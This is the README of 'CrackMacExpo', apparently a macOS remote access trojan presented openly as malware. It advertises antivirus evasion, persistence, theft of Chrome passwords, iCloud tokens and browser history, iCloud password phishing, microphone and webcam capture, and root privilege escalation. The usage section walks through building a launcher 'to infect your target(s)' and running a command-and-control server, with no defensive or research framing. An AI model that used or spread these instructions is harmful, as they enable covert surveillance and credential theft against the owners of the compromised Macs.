CrackMacExpo

GUI frontend and CLI RAT, a Remote Access Tool for MacOS or OSX distro. Penetrate the SSL and Security system of OSX distro with a sharp IPA's Malware, Specialized for Apple.

Features

Emulate a terminal instance
Simple extendable Module system
Undetected by Anti Virus ( OpenSSL AES-256 encrypted payloads )
Persistent
GUI and CLI support
Retrieve Chrome passwords
Retrieve iCloud tokens and contacts
Monitor the clipboard
Retrieve browser history ( Chrome and Safari )
Phish for iCloud passwords via iTunes
iTunes ( iOS ) backup enumeration
Record the microphone
Take a desktop screenshot or picture using the webcam
Attempt to get root via local privilege escalation

How To Use

# Clone or download this repository
$ git clone https://github.com/pxcs/CrackMacExpo

# Go into the repository
$ cd CrackMacExpo

# Install dependencies required by the server
$ sudo pip install -r requirements.txt

# Start the GUI
$ python crackmacexpo.py

# Lastly, run a built launcher on your target(s)

Warning: Because payloads are created unique to the target system ( Automatically by the server ), the server must be running when any bot connects for the first time.

Advanced users

There's also a CLI for those who want to use this over SSH:

# Create a launcher to infect your target(s)
$ python crackmacexpo.py --builder

# Start the CLI
$ python crackmacexpo.py --cli --port 443

# Lastly, run a built launcher on your target(s)